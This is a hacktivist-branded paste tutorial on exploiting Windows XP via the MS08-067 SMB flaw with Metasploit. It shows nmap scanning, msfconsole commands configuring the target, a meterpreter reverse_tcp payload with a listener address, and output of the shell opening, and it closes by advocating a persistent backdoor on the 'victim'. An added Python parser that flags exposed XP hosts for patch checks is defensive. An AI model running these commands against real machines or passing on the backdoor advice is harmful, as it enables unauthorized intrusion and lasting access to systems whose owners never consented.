CyberdarkKh

Exploit Windows xp by IP on Kali Linux

May 29th, 2015
#############################################################
### #Team Cyberdark ( #Operation Freedom Tutorial ) ###
#############################################################



+-------------------------------------------+
Video [ #Anonymous - Exploit Windows ] -> + Exploit Windows xp on Kali Linux by IP +
+-------------------------------------------+


History of MS08-067
======================================================================================================================
MS08-067: Vulnerability in Server Service Could Allow Remote Code Execution (958644)
Severity:  10
CVSS:      (AV:N/AC:L/Au:N/C:C/I:C/A:C)
Published: October 22, 2008
Added:     October 22, 2008
Modified:  February 12, 2015
======================================================================================================================



======================================================================================================================
Using Metasploit it is possible to hack Windows XP machines just by using the IP address of the victim machine. It does not involve installing any backdoor or trojan server on the victim machine. Metasploit does this by exploiting a vulnerability in the Windows SMB (Server) service, catalogued as MS08-067. This exploit works on Windows XP up to and including XP SP3.

Further details and references to the vulnerability can be found at the following pages:

http://cvedetails.com/cve/2008-4250/
http://www.osvdb.org/49243
http://www.microsoft.com/technet/security/bulletin/MS08-067.mspx
http://www.rapid7.com/vulndb/lookup/dcerpc-ms-netapi-netpathcanonicalize-dos

==================================================================================================================
Note: This exploit is old as of now and will only work if the Windows XP on the target machine is unpatched and not running a firewall. If you were to scan a range of IP addresses to discover online Windows XP machines, most of them would likely be patched (through automatic updates).
====================================================================================================================

So if you want to test and practice this exploit, set up your own vulnerable, unpatched XP system.
Scan for open ports

Before exploiting the XP machine with Metasploit it is a good idea to scan for open ports using nmap, to confirm that the ports are accessible and accepting connections. Here is a quick example:

root@cyberdark:~# nmap -n -sV 192.168.1.4

Starting Nmap 6.25 ( http://nmap.org ) at 2013-05-03 06:27 PDT
Nmap scan report for 192.168.1.4
Host is up (0.00051s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE      VERSION
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds Microsoft Windows XP microsoft-ds
2869/tcp open  http         Microsoft HTTPAPI httpd 1.0 (SSDP/UPnP)
MAC Address: 08:00:27:D3:2C:37 (Cadmus Computer Systems)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.52 seconds

Check port number 445. It is running the microsoft-ds (SMB) service. This service is used to share printers and files across the network. It is this service that is vulnerable to the above mentioned exploit and that will be attacked next using Metasploit.
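As an added example (not part of the original paste), a small Python parser for the nmap -sV output shown above that flags hosts exposing 445/tcp with a Windows XP banner, which is the defender's asset check for the exposure this tutorial describes; SAMPLE_SCAN is constructed from the scan above plus an invented second host, and the function names are my own.

```python
import re

# Constructed sample input: the nmap -sV report from the walkthrough above plus a
# second, made-up host so the filter has something to leave out.
SAMPLE_SCAN = """\
Nmap scan report for 192.168.1.4
Host is up (0.00051s latency).
PORT     STATE SERVICE      VERSION
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds Microsoft Windows XP microsoft-ds
2869/tcp open  http         Microsoft HTTPAPI httpd 1.0 (SSDP/UPnP)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Nmap scan report for 192.168.1.7
PORT     STATE SERVICE      VERSION
445/tcp  open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")


def parse_nmap(text):
    """Parse nmap's normal output into {address: {(port, proto): (state, service, version)}}."""
    hosts, current = {}, None
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            current = hosts.setdefault(m.group(1), {})
            continue
        m = PORT_RE.match(line)
        if m and current is not None:
            port, proto, state, service, version = m.groups()
            current[(int(port), proto)] = (state, service, version.strip())
    return hosts


def smb_xp_exposures(hosts):
    """Addresses with 445/tcp open and an XP banner: an unsupported OS exposing SMB,
    so the MS08-067 patch (KB958644) status has to be verified before it stays online."""
    flagged = []
    for address, ports in hosts.items():
        state, _service, version = ports.get((445, "tcp"), ("closed", "", ""))
        if state == "open" and "Windows XP" in version:
            flagged.append(address)
    return flagged


if __name__ == "__main__":
    print(smb_xp_exposures(parse_nmap(SAMPLE_SCAN)))  # ['192.168.1.4']
```

Feed it the saved output of a scan of your own lab range instead of SAMPLE_SCAN to get the list of hosts that need the patch check.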
=========================================================================================================================
Exploit using metasploit

1. The exploit is quite easy to launch. Start msfconsole.

Using notepad to track pentests? Have Metasploit Pro report on hosts,
services, sessions and evidence -- type 'go_pro' to launch it now.

=[ metasploit v4.6.0-dev [core:4.6 api:1.0]
+ -- --=[ 1059 exploits - 595 auxiliary - 175 post
+ -- --=[ 277 payloads - 29 encoders - 8 nops

msf >

2. Select the exploit with the 'use' command.

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) >

If you want to read information about the exploit, type 'info' and hit enter.

3. See the options available

msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf exploit(ms08_067_netapi) >

The important option to set is RHOST (Remote Host). This is the IP address of the victim machine that is running the vulnerable Windows XP. In this example the IP address is 192.168.1.4.
So set the option:

msf exploit(ms08_067_netapi) > set RHOST 192.168.1.4
RHOST => 192.168.1.4
msf exploit(ms08_067_netapi) >

4. Select the payload

Next comes the payload. The payload is the piece of code that runs along with the exploit and provides the hacker with a reverse shell. We are going to use the Windows meterpreter payload. If you want to see all the available payloads, use the 'show payloads' command.

msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp

Why meterpreter? Because meterpreter is a very powerful kind of reverse shell that has lots of functionality already built in. The functionality includes common post-exploitation tasks like scanning the target's network, hardware, accessing devices etc. Meterpreter can also start a VNC session.

5. Check options once again

Now that we have selected our payload, it's time to check the options once again.

msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.1.4      yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process, none
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf exploit(ms08_067_netapi) >

Now the options also include the payload options. The important options to set are LHOST and LPORT. LHOST is the IP address of the local (hacker) machine. LPORT is the port number on which the reverse shell listener will receive the incoming shell.

So set up the correct values:

msf exploit(ms08_067_netapi) > set LHOST 192.168.1.33
LHOST => 192.168.1.33
msf exploit(ms08_067_netapi) > set LPORT 6666
LPORT => 6666
msf exploit(ms08_067_netapi) >

6. Launch the exploit

Now Metasploit is all configured to launch the exploit. Enter 'exploit' and hit enter.

msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.1.33:6666
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 192.168.1.4
[*] Meterpreter session 2 opened (192.168.1.33:6666 -> 192.168.1.4:1044) at 2013-05-03 03:27:25 -0700

meterpreter >


After successfully exploiting Windows, persistence is important.

How to create a persistent backdoor after exploiting a Windows OS using Metasploit, and why persistence is needed after exploiting a Windows victim

In previous posts I explained how to exploit and gain access to a Windows OS; after gaining access it's important to create a backdoor to exploit again.



If you have succeeded in exploiting a system you may consider placing a back-door in order to connect again easily with your target. For example, if the user decides to install a patch or to remove the vulnerable service from his system, then you will need to figure out an alternative way of getting access to the remote system again. That's why back-doors are important: they can maintain access to a system that you have compromised.